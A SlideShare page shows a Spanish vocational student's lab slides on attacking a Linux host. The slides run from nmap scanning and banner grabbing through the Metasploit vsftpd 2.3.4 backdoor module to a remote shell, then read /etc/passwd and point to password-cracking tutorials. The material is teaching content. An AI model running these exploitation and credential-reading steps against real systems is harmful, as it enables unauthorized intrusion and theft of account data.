SlideShare una empresa de Scribd logo
Miguel Ángel Marchal Barrera
COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017
EXPLOTACIÓN SISTEMA OPERATIVO
PÁGINA 1|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
IDENTIFICACIÓN DEL OBJETIVO
Comprobar si tenemosacceso a la máquina que queremosatacar
Comandoping+ direccióndel interfazde red
Abrirel terminal de Kali-linux
Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar)
Si tenemosconectividad nose perderáningúnpaquete enviado
Detectar los equiposactivos de la red
Comandonmap –sP + direcciónde red
Introducir:nmap–sP 192.168.1.0/24
Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y
lasdireccionesIPde cada equipo.
PÁGINA 2|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE PUERTOS Y SERVICIOS
Identificaciónde puertosque usa la máquina
Comandonmap –sT -O+ direccióndel interfazde red
Introducir:nmap –sT -O192.168.1.104
Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
PÁGINA 3|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Comprobar versionesde servicios
Comandonmap –sT –sV direccióndel interfazde red
Introducir:nmap –sT –sV 192.168.1.104
Muestra puertosabiertos,serviciosyversionesde éstos.
Comprobar versionesde serviciosmediante comando telnet
Comandotelnet+IP del interfazde red+ puertoabierto
Introducir:telnet192.168.1.104 21
Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista
algunavulnerabilidadenlaversión.
PÁGINA 4|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Conexióna través del servicioseleccionado
Comandotelnet,FTPySSH
Accesocon comandotelnet
Comandotelnet+IP interfazde red
Introducir:telnet192.168.1.104
Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido.
Accesocon comandoFTP
Comandoftp + IPinterfazde red
Introducir:ftp192.168.1.104
Accesomediante servicioftppidiendocontraseña desconocida.
Accesocon comandoSSH
Comandossh + IP interfazde red
Introducir:ssh 192.168.1.104
Accesomediante serviciosshpidiendocontraseña desconocida.
PÁGINA 5|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE VULNERABILIDADES
Herramientametasploit
Iniciarla herramientaintroduciendo:msfconsole
Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio
Introducircomando:searchftp
Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque
queremosatacar.
PÁGINA 6|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
EXPLOTACIÓN DE VULNERABILIDADES
Localizamosel xploitpreparadoparaatacar
Este exploitnosinformaque es excelente parausar.
Para usar el xploit
Comandouse + direccióndel exploit
Introducir:use exploit/unix/ftp/vsftpd_234_backdoor
Comprobarla configuraciónde parámetros
Comandoshowoptions
Introducir:showoptions
Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos
configurarel RHOST asignandolaIPde lamáquinaatacada.
RHOST: Remote Host.
RPORT: Remote Port.
ConfiguraciónRHOST
ComandosetRHOST + direccióndel interfazde red
Introducir:setRHOST 192.168.1.104
PÁGINA 7|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Buscar payloaddisponible
Comandoshowpayloads
Introducir:showpayloads
Muestra el disponible
Utilizarel payloaddisponible
Comandosetpayload + payloaddisponible
Introducir:setpayloadcmd/unix/interact
Accederremotamente alamáquina
Comandoexploit
Introducior:exploit
Accesopermitidoremotoalamáquinaatacada.
Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login
de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
PÁGINA 8|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
POST-EXPLOTACIÓN DEL SISTEMA
Uso de comandoscomosi estuviéramosenlamismamáquina.
Comandols
Directoriosde laraíz de la máquinaatacada.
PÁGINA 9|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Obtenciónde contraseña
Comandocat
Introducir:cat etc/passwd
La estructuraes:
<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell>
<nombre>: Nombre de usuario.
<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el
usuario está bloqueado y si es igual a “!!” no tiene contraseña.
<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.
<gid>: Grupo al que está asignado.
<descripción opcional>: Descripción añadida al perfil de usuario.
<carpeta>: Carpeta de inicio de usuario de cada usuario.
<shell>: Intérprete de línea de comandos de Linux.
Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está
alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a
paso para descifrarlas, en este link se explica cómo.
https://www.youtube.com/watch?v=DntHkcbq-wY

Más contenido relacionado

PDF
Configuracion De Eigrp Y Loopback
PPT
Seguridad layer 2
PDF
Alarmas bts ericsson
DOCX
Carga del sistema operativo
PDF
Laboratorio Crear, Verificar y Borrar Vlan
PPT
Configuración acl extendida
PDF
Tutorial de configuracion de routers
PDF
Practica 1 iptables
Configuracion De Eigrp Y Loopback
Seguridad layer 2
Alarmas bts ericsson
Carga del sistema operativo
Laboratorio Crear, Verificar y Borrar Vlan
Configuración acl extendida
Tutorial de configuracion de routers
Practica 1 iptables

La actualidad más candente (20)

DOC
Ejercicio ccna 3
PDF
Examen l ry s diciembre2005 resuelto
PPTX
Ejercicio 23 05-2016 cisco packet tracer
PPTX
EJERCICIOS EN PACKET TRACER
PDF
Práctica final acl
PPTX
Resumen comandos router
PDF
Comandos Configuración Router CISCO
DOCX
DOCX
Eliminar una vlan
PDF
Laboratorio Vlan
DOCX
Configurar vlan en packet tracer
PPTX
PDF
Ejercicios ripv2
PDF
Configurando Ospf Dr Y Bdr
PDF
Comandos de configuracion de dispositivos cisco
PDF
Configuración Firewall - CISCO ASA 5510
PDF
Laboratorio 8 enrutamiento dinamico part 2
DOCX
Practica con firewall asa
PDF
Guia básica Packet Tracer
Ejercicio ccna 3
Examen l ry s diciembre2005 resuelto
Ejercicio 23 05-2016 cisco packet tracer
EJERCICIOS EN PACKET TRACER
Práctica final acl
Resumen comandos router
Comandos Configuración Router CISCO
Eliminar una vlan
Laboratorio Vlan
Configurar vlan en packet tracer
Ejercicios ripv2
Configurando Ospf Dr Y Bdr
Comandos de configuracion de dispositivos cisco
Configuración Firewall - CISCO ASA 5510
Laboratorio 8 enrutamiento dinamico part 2
Practica con firewall asa
Guia básica Packet Tracer
Publicidad

Similar a Explotación sistema operativo (20)

DOCX
Documento24 practica 5
PPTX
Escaneo de Puertos
PPTX
firewall.pptx
PDF
Utilización del Software Optix Navigator.pdf
PDF
Herramientas administrativas de red en diferentes sistemas operativos
PDF
Herramientas administrativas de red en diferentes sistemas operativos
DOCX
Practica 5 irdt
DOCX
Practica 5 irdt
DOCX
Practica 5 irdt
PDF
Comandos utilizados en redes anderson alvarado 6to computacion
PDF
Listas de acceso estándar y extendidas
PDF
Listas de acceso
DOC
Practica 1 eigrp
PDF
Seguridad: Backtrack2
PDF
How to medidas de desempeño
PDF
Como usar Aircrack
PDF
Taller
PDF
Linux red + VNC
Documento24 practica 5
Escaneo de Puertos
firewall.pptx
Utilización del Software Optix Navigator.pdf
Herramientas administrativas de red en diferentes sistemas operativos
Herramientas administrativas de red en diferentes sistemas operativos
Practica 5 irdt
Practica 5 irdt
Practica 5 irdt
Comandos utilizados en redes anderson alvarado 6to computacion
Listas de acceso estándar y extendidas
Listas de acceso
Practica 1 eigrp
Seguridad: Backtrack2
How to medidas de desempeño
Como usar Aircrack
Taller
Linux red + VNC
Publicidad

Último (20)

PDF
Estrategia de Apoyo de Daylin Castaño (5).pdf
DOCX
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
PPTX
la-historia-de-la-medicina Edna Silva.pptx
PPTX
modulo seguimiento 1 para iniciantes del
PDF
Diapositiva proyecto de vida, materia catedra
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PDF
PRESENTACIÓN GENERAL MIPIG - MODELO INTEGRADO DE PLANEACIÓN
PPTX
CLAASIFICACIÓN DE LOS ROBOTS POR UTILIDAD
DOCX
TRABAJO GRUPAL (5) (1).docxjesjssjsjjskss
PPTX
Mecanismos-de-Propagacion de ondas electromagneticas
PDF
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
DOCX
Guía 5. Test de orientación Vocacional 2.docx
PDF
TRABAJO DE TECNOLOGIA.pdf...........................
PPTX
El uso de las TIC en la vida cotidiana..
PPTX
Historia Inteligencia Artificial Ana Romero.pptx
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
PPTX
ccna: redes de nat ipv4 stharlling cande
PDF
MANUAL de recursos humanos para ODOO.pdf
PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
Estrategia de Apoyo de Daylin Castaño (5).pdf
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
historia_web de la creacion de un navegador_presentacion.pptx
la-historia-de-la-medicina Edna Silva.pptx
modulo seguimiento 1 para iniciantes del
Diapositiva proyecto de vida, materia catedra
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PRESENTACIÓN GENERAL MIPIG - MODELO INTEGRADO DE PLANEACIÓN
CLAASIFICACIÓN DE LOS ROBOTS POR UTILIDAD
TRABAJO GRUPAL (5) (1).docxjesjssjsjjskss
Mecanismos-de-Propagacion de ondas electromagneticas
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
Guía 5. Test de orientación Vocacional 2.docx
TRABAJO DE TECNOLOGIA.pdf...........................
El uso de las TIC en la vida cotidiana..
Historia Inteligencia Artificial Ana Romero.pptx
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
ccna: redes de nat ipv4 stharlling cande
MANUAL de recursos humanos para ODOO.pdf
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...

Explotación sistema operativo

  • 1. Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
  • 2. PÁGINA 1|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
  • 3. PÁGINA 2|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
  • 4. PÁGINA 3|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
  • 5. PÁGINA 4|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
  • 6. PÁGINA 5|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
  • 7. PÁGINA 6|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
  • 8. PÁGINA 7|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
  • 9. PÁGINA 8|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
  • 10. PÁGINA 9|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY